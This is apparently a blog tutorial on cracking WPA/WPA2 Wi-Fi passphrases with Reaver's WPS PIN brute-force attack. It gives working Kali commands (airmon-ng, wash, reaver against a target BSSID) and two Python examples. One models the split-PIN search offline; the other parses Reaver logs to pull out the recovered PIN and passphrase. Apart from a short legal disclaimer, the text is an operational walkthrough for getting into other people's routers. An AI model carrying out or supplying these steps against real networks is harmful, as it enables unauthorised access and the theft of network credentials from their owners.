Reaver – Overview
Reaver implements a brute force attack against Wi-Fi Protected Setup (WPS) registrar PINs in order to recover WPA/WPA2 passphrases. A WPS PIN has 8 digits, but the last digit is a checksum and the AP's reply to message M4 reveals whether the first four digits are right while its reply to M6 reveals whether the last four are, so at most 10,000 + 1,000 = 11,000 PINs need to be tried instead of 100,000,000. Once the PIN is accepted, the AP hands over its current WPA/WPA2 configuration, including the passphrase, so changing the passphrase alone does not help while WPS stays enabled. On average Reaver recovers the target AP's plain-text WPA/WPA2 passphrase in 4-10 hours, depending on the AP; in practice it usually takes about half that time, since the correct PIN is rarely the last one tried.
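To make the 11,000-attempt figure concrete, here is an added example (not code from this post or from the Reaver project) that computes the WPS PIN checksum, sizes the search space, and runs a Reaver-style half-by-half search against a constructed stand-in for an AP's WPS state machine. The FakeWpsAp class, the sample PINs and the seconds-per-PIN figure are assumptions for illustration; no radio traffic is involved.

```python
"""Added example: the WPS PIN search space that Reaver exploits, modelled offline."""


def wps_pin_checksum(first_seven: int) -> int:
    """Checksum digit for a 7-digit WPS PIN body (the algorithm from the WPS spec)."""
    accum = 0
    while first_seven:
        accum += 3 * (first_seven % 10)
        first_seven //= 10
        accum += first_seven % 10
        first_seven //= 10
    return (10 - accum % 10) % 10


def is_valid_wps_pin(pin: str) -> bool:
    """True if pin is 8 digits and its last digit is the correct checksum."""
    return (len(pin) == 8 and pin.isdigit()
            and int(pin[7]) == wps_pin_checksum(int(pin[:7])))


def search_space() -> dict:
    """Worst-case number of PINs for a naive attacker versus the split attack."""
    return {
        "eight_digits_no_checksum": 10 ** 8,
        "seven_digits_plus_checksum": 10 ** 7,
        "split_halves": 10 ** 4 + 10 ** 3,   # M4 confirms first half, M6 the second
    }


class FakeWpsAp:
    """Constructed stand-in for an AP's WPS state machine (assumption, not Reaver code).

    A real AP NACKs M4 when the first PIN half is wrong and NACKs M6 when the
    second half is wrong; that leak is what Reaver uses. This class answers
    the same two questions without any radio."""

    def __init__(self, pin: str):
        assert is_valid_wps_pin(pin)
        self._pin = pin

    def first_half_ok(self, half: str) -> bool:   # models the reply to M4
        return half == self._pin[:4]

    def second_half_ok(self, half: str) -> bool:  # models the reply to M6
        return half == self._pin[4:]


def recover_pin(ap: FakeWpsAp):
    """Reaver-style search: fix the first half, then the second (3 digits + checksum).

    Returns (pin, attempts) on success or (None, attempts) otherwise."""
    attempts = 0
    for first in range(10_000):
        attempts += 1
        if ap.first_half_ok(f"{first:04d}"):
            break
    else:
        return None, attempts
    for second in range(1_000):
        attempts += 1
        body = f"{first:04d}{second:03d}"
        candidate = body + str(wps_pin_checksum(int(body)))
        if ap.second_half_ok(candidate[4:]):
            return candidate, attempts
    return None, attempts


def estimate_hours(attempts: int, seconds_per_pin: float) -> float:
    """Wall-clock estimate; seconds_per_pin is an assumption, real APs vary widely."""
    return attempts * seconds_per_pin / 3600


if __name__ == "__main__":
    print(search_space())
    pin, tries = recover_pin(FakeWpsAp("12345670"))   # constructed target PIN
    print(pin, tries, round(estimate_hours(tries, 1.3), 2), "hours at 1.3 s/PIN")
```

With a target PIN of 12345670 the search needs 1,803 attempts; the worst case (99999995, the highest valid PIN) needs the full 11,000, which at an assumed 1.3 seconds per PIN is roughly four hours, the low end of the range quoted above.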
NOTE: It is illegal to perform this attack on a network that does not belong to you unless you have explicit permission from the owner. The information presented here is for educational purposes only.
What You’ll Need
- Kali Linux : Kali Linux is a Debian-derived Linux distribution designed for digital forensics and penetration testing. It is maintained and funded by Offensive Security Ltd. Mati Aharoni, Devon Kearns and Raphaël Hertzog are the core developers.
- Wireless USB adapter : the adapter must support monitor mode and packet injection. I cannot guarantee this will work with every internal wireless card, so I recommend an external USB adapter with a chipset known to support both.
- Patience : the process is simple, but brute forcing the PIN takes time, so you have to be patient. Kicking the computer won't help.
Steps for Hacking Wi-Fi using Reaver
- The first thing we need to do is check that Kali recognizes the wireless adapter. Run the command “airmon-ng” with no arguments; it lists each wireless interface (typically “wlan0”) along with its driver and chipset.
- Once the adapter is recognized we need to put it into monitor mode. Run the command “airmon-ng start wlan0”. If all goes well some information will scroll by and the tool reports that monitor mode has been enabled on a new interface, wlan0mon. If airmon-ng warns about processes that could interfere (NetworkManager, wpa_supplicant), run “airmon-ng check kill” first and then start monitor mode again.
- To find a router that is vulnerable to Reaver's attack we use wash, a scanner that ships with Reaver and lists nearby networks advertising WPS. Run the command “wash -i wlan0mon”. Pick a target whose WPS is not locked (the WPS Locked / Lck column reads No): an AP that has locked WPS after too many failed attempts will not accept PIN guesses until it unlocks.
- Copy the target's BSSID and note its channel, then press CTRL+C to stop the scan.
- Now run the following command, using the monitor-mode interface created above (wlan0mon; older versions of airmon-ng named it mon0 instead):
reaver -i wlan0mon -b (Target BSSID) -c (Target channel) -vv
- The -c option is optional but keeps Reaver on the right channel instead of hopping. Reaver will now run a brute force attack against the router's WPS PIN. It keeps going until it finds the PIN and the AP hands over the wireless passphrase, usually within 4-10 hours. Progress is saved to a session file, so if the run is interrupted you can rerun the same command and Reaver offers to resume where it stopped. Here is a screenshot of what it looks like when Reaver cracks the password: the final lines report the WPS PIN and the WPA PSK.
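Because a run takes hours, it is worth logging Reaver's verbose output to a file and summarising it. The following added example (not code from this post or from the Reaver project) parses the kinds of lines reaver -vv prints, counts PIN attempts and rate-limiting warnings, and pulls out the recovered PIN, PSK and SSID. The sample log is constructed to resemble Reaver's output; the line formats the regular expressions expect are an assumption based on Reaver 1.4 and the t6x fork (older builds print the PIN unquoted, which the pattern also accepts).

```python
"""Added example: summarise a saved reaver -vv log. Formats are assumptions, see lead-in."""
import re

# Constructed sample log, written to resemble reaver -vv output (not a real capture).
SAMPLE_LOG = """\
[+] Waiting for beacon from 00:11:22:33:44:55
[+] Switching wlan0mon to channel 6
[+] Associated with 00:11:22:33:44:55 (ESSID: ExampleNet)
[+] Trying pin "12345670"
[+] Sending EAPOL START request
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received WSC NACK
[+] 0.01% complete @ 2024-01-01 12:00:05 (3 seconds/pin)
[+] Trying pin "00000000"
[!] WARNING: Detected AP rate limiting, waiting 60 seconds before re-checking
[+] Trying pin "00010009"
[+] 0.03% complete @ 2024-01-01 12:01:14 (3 seconds/pin)
[+] WPS PIN: '12345670'
[+] WPA PSK: 'correct horse battery staple'
[+] AP SSID: 'ExampleNet'
"""

PIN_TRY = re.compile(r'^\[\+\] Trying pin "?(\d{8})"?')
PROGRESS = re.compile(r'^\[\+\] ([\d.]+)% complete @ (.+?) \((\d+) seconds/pin\)')
RATE_LIMIT = re.compile(r'^\[!\] WARNING: Detected AP rate limiting, waiting (\d+) seconds')
RESULT = re.compile(r"^\[\+\] (WPS PIN|WPA PSK|AP SSID): '(.*)'$")
RESULT_KEYS = {"WPS PIN": "pin", "WPA PSK": "psk", "AP SSID": "ssid"}

# First half (10^4) then second half including checksum (10^3): Reaver's search space.
WPS_SEARCH_SPACE = 10 ** 4 + 10 ** 3


def parse_reaver_log(text: str) -> dict:
    """Walk the log line by line and collect counters, last progress and final result."""
    summary = {
        "pins_tried": 0, "last_pin": None,
        "rate_limit_events": 0, "rate_limit_wait_s": 0,
        "percent": None, "seconds_per_pin": None, "last_update": None,
        "pin": None, "psk": None, "ssid": None,
    }
    for line in text.splitlines():
        line = line.rstrip()
        if m := PIN_TRY.match(line):
            summary["pins_tried"] += 1
            summary["last_pin"] = m.group(1)
        elif m := PROGRESS.match(line):
            summary["percent"] = float(m.group(1))
            summary["last_update"] = m.group(2)
            summary["seconds_per_pin"] = int(m.group(3))
        elif m := RATE_LIMIT.match(line):
            # A locked AP is the usual reason a run stretches far beyond the estimate.
            summary["rate_limit_events"] += 1
            summary["rate_limit_wait_s"] += int(m.group(1))
        elif m := RESULT.match(line):
            summary[RESULT_KEYS[m.group(1)]] = m.group(2)
    return summary


def estimate_remaining_hours(summary: dict, total_pins: int = WPS_SEARCH_SPACE):
    """Rough time left, from Reaver's own percent-complete and seconds-per-pin figures.

    Returns 0.0 once the PIN is recovered and None if no progress line was seen."""
    if summary.get("pin"):
        return 0.0
    if summary.get("percent") is None or summary.get("seconds_per_pin") is None:
        return None
    remaining = (1 - summary["percent"] / 100) * total_pins
    return remaining * summary["seconds_per_pin"] / 3600


if __name__ == "__main__":
    done = parse_reaver_log(SAMPLE_LOG)
    print(done)
    in_progress = parse_reaver_log(SAMPLE_LOG.split("[+] WPS PIN")[0])
    print("hours left:", round(estimate_remaining_hours(in_progress), 2))
```

To use it on a real run, redirect Reaver's output with something like “reaver -i wlan0mon -b (Target BSSID) -vv | tee reaver.log” and feed the file to parse_reaver_log. The remaining-time estimate ignores lock-outs, so a growing rate_limit_events count is the signal that the AP is throttling and the estimate will be optimistic.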